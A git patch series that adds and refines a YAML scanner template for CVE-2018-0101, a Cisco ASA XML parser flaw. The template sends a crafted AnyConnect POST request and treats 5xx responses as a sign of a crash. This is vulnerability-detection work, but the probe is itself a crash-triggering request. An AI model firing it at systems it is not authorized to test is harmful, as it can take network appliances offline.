From 7589706bfae89f7d28348cfaf83cc18fe0d79c5f Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:46:40 +0700 Subject: [PATCH 01/11] :fire: Add CVE-2018-0101 --- cves/2018/CVE-2018-0101.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2018/CVE-2018-0101.yaml diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml new file mode 100644 index 00000000000..c89da0ebb37 --- /dev/null +++ b/cves/2018/CVE-2018-0101.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-0101 + +info: + name: Cisco ASA Denial-of-Service # Leads to RCE + author: dwisiswant0 + severity: critical + description: | + A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, + remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that + the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. + tags: cve,cve2018,cisco,dos,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/" + headers: + Content-Type: "application/x-www-form-urlencoded" + X-Aggregate-Auth: "1" + X-Transcend-Version: "1" + Accept-Encoding: "identity" + X-AnyConnect-Platform: "linux-64" + X-Support-HTTP-Auth: "false" + X-Pad: "0000000000000000000000000000000000000000" + body: | + + + A + + + matchers: + - type: status + status: + - 500 \ No newline at end of file From f0c941a02f6d62e1cb0edb75a4d5fd8cffe505f5 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:47:01 +0700 Subject: [PATCH 02/11] Add reference --- cves/2018/CVE-2018-0101.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index c89da0ebb37..d7da097947f 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -4,6 +4,7 @@ info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 severity: critical + reference: https://www.exploit-db.com/exploits/43986 description: | A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that From b8bf230aaff351059a26b1f0abc30e6804fc1986 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:47:38 +0700 Subject: [PATCH 03/11] Add possible crash 5xx status codes --- cves/2018/CVE-2018-0101.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index d7da097947f..a566649adfe 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -32,4 +32,8 @@ requests: matchers: - type: status status: - - 500 \ No newline at end of file + - 500 + - 501 + - 502 + - 503 + - 504 \ No newline at end of file From 2589645f7e5083ec8a82b13ef98945d7aebea00e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:48:46 +0700 Subject: [PATCH 04/11] Add CVE-2018-0101 to cisco-asa-workflow --- workflows/cisco-asa-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c5..1cfe3751a3a 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -16,4 +16,5 @@ workflows: subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml - - template: cves/2018/CVE-2018-0296.yaml \ No newline at end of file + - template: cves/2018/CVE-2018-0296.yaml + - template: cves/2018/CVE-2018-0101.yaml \ No newline at end of file From 2a8cb0052527c5e438a24f348b64084cd3b523da Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 20:33:23 +0700 Subject: [PATCH 05/11] Add matcher condition to 'or' --- cves/2018/CVE-2018-0101.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index a566649adfe..fb47a97caa7 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -36,4 +36,5 @@ requests: - 501 - 502 - 503 - - 504 \ No newline at end of file + - 504 + condition: or \ No newline at end of file From e80e67a59215bf6a6b201b9cee9b471f2d0d6802 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:06:04 +0700 Subject: [PATCH 06/11] Using RAW requests --- cves/2018/CVE-2018-0101.yaml | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index fb47a97caa7..03bec56569e 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -12,18 +12,24 @@ info: tags: cve,cve2018,cisco,dos,rce requests: - - method: POST - path: - - "{{BaseURL}}/" - headers: - Content-Type: "application/x-www-form-urlencoded" - X-Aggregate-Auth: "1" - X-Transcend-Version: "1" - Accept-Encoding: "identity" - X-AnyConnect-Platform: "linux-64" - X-Support-HTTP-Auth: "false" - X-Pad: "0000000000000000000000000000000000000000" - body: | + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 + A From 53d8ab832249b32a48d996a2c178f2323adb88bc Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:06:37 +0700 Subject: [PATCH 07/11] Using DSL type of matcher --- cves/2018/CVE-2018-0101.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 03bec56569e..4f8237783b6 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -36,11 +36,6 @@ requests: matchers: - - type: status - status: - - 500 - - 501 - - 502 - - 503 - - 504 - condition: or \ No newline at end of file + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 500" \ No newline at end of file From b804f5f6760abaa27a325ed192dff789e07fe382 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:07:23 +0700 Subject: [PATCH 08/11] Add more possible crash 5xx status codes --- cves/2018/CVE-2018-0101.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 4f8237783b6..c4eeec855bd 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -38,4 +38,4 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 200 && status_code_2 == 500" \ No newline at end of file + - "status_code_1 == 200 && status_code_2 == 500 || status_code_2 == 501 || status_code_2 == 502 || status_code_2 == 503 || status_code_2 == 504" \ No newline at end of file From 2925d53ab9b2f70d5a639e15ebbe3dfc9c95cfe6 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 28 Mar 2021 02:09:26 +0700 Subject: [PATCH 09/11] Fix wrong identations --- cves/2018/CVE-2018-0101.yaml | 38 ++++++++++++++++++------------------ 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index c4eeec855bd..578e4527c22 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -13,27 +13,27 @@ info: requests: - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - X-Aggregate-Auth: 1 - X-Transcend-Version: 1 - Accept-Encoding: identity - X-AnyConnect-Platform: linux-64 - X-Support-HTTP-Auth: false - X-Pad: 0000000000000000000000000000000000000000 + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 - - - A - + + + A + matchers: - type: dsl From b7efe0b3c9b4661c068e35fdff8f6986caeea386 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 1 Apr 2021 13:59:23 +0530 Subject: [PATCH 10/11] minor fixes and improvements --- cves/2018/CVE-2018-0101.yaml | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 578e4527c22..b918267771f 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -35,7 +35,19 @@ requests: A + req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - - "status_code_1 == 200 && status_code_2 == 500 || status_code_2 == 501 || status_code_2 == 502 || status_code_2 == 503 || status_code_2 == 504" \ No newline at end of file + - "status_code_1 == 200" + + - type: dsl + dsl: + - "status_code_2 == 500" + - "status_code_2 == 501" + - "status_code_2 == 502" + - "status_code_2 == 503" + - "status_code_2 == 504" + condition: or + From 06827e41c947f8f96e194672b2cd84082663a29c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 1 Apr 2021 14:01:09 +0530 Subject: [PATCH 11/11] Update CVE-2018-0101.yaml --- cves/2018/CVE-2018-0101.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index b918267771f..8448e3c2f62 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -49,5 +49,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or - + condition: or \ No newline at end of file